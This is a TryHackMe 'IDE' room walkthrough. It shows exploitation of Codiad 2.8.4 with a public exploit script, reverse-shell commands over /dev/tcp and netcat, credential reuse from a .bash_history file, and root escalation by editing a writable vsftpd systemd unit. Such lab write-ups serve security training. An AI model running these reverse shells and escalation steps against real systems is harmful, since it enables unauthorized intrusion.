TryHackMe: IDE
IDE was nice, every room follows the same approach yet every room feels so different. I’ve done so many sudo permissions privilege escalations but i still feel like i learn a new thing on each room.
https://tryhackme.com/room/ide
Initial Enumeration
Nmap Scan
We start with our nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T4 -n -sC -sV -Pn -p- 10.10.35.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-13 14:55 GMT
Nmap scan report for 10.10.35.131
Host is up (0.079s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::-
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28 (RSA)
| 256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87 (ECDSA)
|_ 256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
62337/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Codiad 2.8.4
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.23 seconds
We got 3 interesting ports:
- 21
- 80
- 62337
FTP
We’ll start with ftp, and as it says on the scan, anonymous login is allowed. Inside, we don’t seem to find anything at first except when we cd into ...:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
----- ftp
┌──(kali㉿kali)-[~/Desktop]
└─$ ftp 10.10.35.131
Connected to 10.10.35.131.
220 (vsFTPd 3.0.3)
Name (10.10.35.131:kali): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||44785|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 114 4096 Jun 18 2021 .
drwxr-xr-x 3 0 114 4096 Jun 18 2021 ..
drwxr-xr-x 2 0 0 4096 Jun 18 2021 ...
226 Directory send OK.
ftp> cd ...
250 Directory successfully changed.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 151 Jun 18 2021 -
226 Directory send OK.
A file with the name -, we can download it to to our machine and it see its content:
1
2
3
4
Hey john,
I have reset the password as you have asked. Please use the default password to login.
Also, please take care of the image file ;)
- drac.
Web 62337
We found some names and a hint for a password, but nowhere to login. We navigate to port 80, but it didn’t have anything, so we proceed to port 62337:
A login page, just what we wanted. And after some trial and error we see that john’s credentials are john:password, and we are able to get inside:
We couldn’t find much to do; gobuster didn’t give anything good, so we try google. Should be easy enough, since the title of the web page has the tool name and version:
Shell as www-data
We find an exploit, and before sending the payload, it asks us to start a listener with a reverse shell on the port chosen and another listener on one port above:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(venv)─(kali㉿kali)-[~/Desktop]
└─$ python3 49705.py http://10.10.35.131:62337/ john password - 4444 linux
[+] Please execute the following command on your vps:
echo 'bash -c "bash -i >/dev/tcp/-/4445 0>&1 2>&1"' | nc -lnvp 4444
nc -lnvp 4445
[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"john"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : {"status":"success","data":{"name":"CloudCall","path":"\/var\/www\/html\/codiad_projects"}}
[+] Writeable Path : /var/www/html/codiad_projects
[+] Sending payload...
And after doing both separately, we can now run it without any problems and get a shell:
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlnp 4445
listening on [any] 4445 ...
connect to [-] from (UNKNOWN) [10.10.35.131] 39094
bash: cannot set terminal process group (892): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ide:/var/www/html/codiad/components/filemanager$
Shell as drac
As we are enumerating, inside the drac user we find some credentials on its readable .bash_history:
1
2
www-data@ide:/home/drac$ cat .bash_history
mysql -u drac -p 'Th3dRaCULa1sR3aL'
We use the credentials to log into ssh, and we can now read the user flag:
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh drac@10.10.35.131
drac@10.10.35.131's password:
drac@ide:~$ ls
user.txt
drac@ide:~$ cat user.txt
[REDACTED]
Shell as root
Enumerating drac we see that we have sudo permissions to run a vsftpd service:
1
2
3
4
5
6
7
drac@ide:~$ sudo -l
[sudo] password for drac:
Matching Defaults entries for drac on ide:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User drac may run the following commands on ide:
(ALL : ALL) /usr/sbin/service vsftpd restart
And checking the service, we can find the file where it’s being loaded from and check its permissions:
1
2
3
4
5
6
7
8
9
10
11
12
13
drac@ide:~$ systemctl status vsftpd.service
● vsftpd.service - vsftpd FTP server
Loaded: loaded (/lib/systemd/system/vsftpd.service; enabled; vendor preset: enabled)
Active: active (running) since Thu 2025-02-13 16:17:01 UTC; 1min 45s ago
Process: 737 ExecStartPre=/bin/mkdir -p /var/run/vsftpd/empty (code=exited, status=0/SUCCESS)
Main PID: 779 (vsftpd)
Tasks: 1 (limit: 498)
CGroup: /system.slice/vsftpd.service
└─779 /usr/sbin/vsftpd /etc/vsftpd.conf
Warning: Journal has been rotated since unit was started. Log output is incomplete or unavailable.
drac@ide:~$ ls -la /lib/systemd/system/vsftpd.service
-rw-rw-r-- 1 root drac 248 Aug 4 2021 /lib/systemd/system/vsftpd.service
We have write permissions, and we also see that it runs a process called ExecStartPre so our main goal is to change it into a reverse shell command, which we can do with the nano command. After that, we first need to reload the systemctl daemon configuration:
1
2
3
4
5
6
drac@ide:~$ systemctl daemon-reload
==== AUTHENTICATING FOR org.freedesktop.systemd1.reload-daemon ===
Authentication is required to reload the systemd state.
Authenticating as: drac
Password:
==== AUTHENTICATION COMPLETE ===
And run the service with sudo:
1
2
3
4
5
6
7
8
9
10
drac@ide:~$ sudo /usr/sbin/service vsftpd restart
Job for vsftpd.service failed because the control process exited with error code.
See "systemctl status vsftpd.service" and "journalctl -xe" for details.
drac@ide:~$ systemctl status vsftpd.service
● vsftpd.service - vsftpd FTP server
Loaded: loaded (/lib/systemd/system/vsftpd.service; enabled; vendor preset: enabled)
Active: failed (Result: exit-code) since Thu 2025-02-13 16:27:15 UTC; 4s ago
Process: 1657 ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf (code=killed, signal=TERM)
Process: 1758 ExecStartPre=/bin/bash -c bash -i >& /dev/tcp/-/4444 0>&1 (code=exited, status=1/FAILURE)
Main PID: 1657 (code=killed, signal=TERM)
We get a root shell and can now read the root flag:
1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlnp 4444
listening on [any] 4444 ...
connect to [-] from (UNKNOWN) [10.10.35.131] 46556
bash: cannot set terminal process group (22296): Inappropriate ioctl for device
bash: no job control in this shell
root@ide:/# cd root
root@ide:/root# cat root.txt
[REDACTED]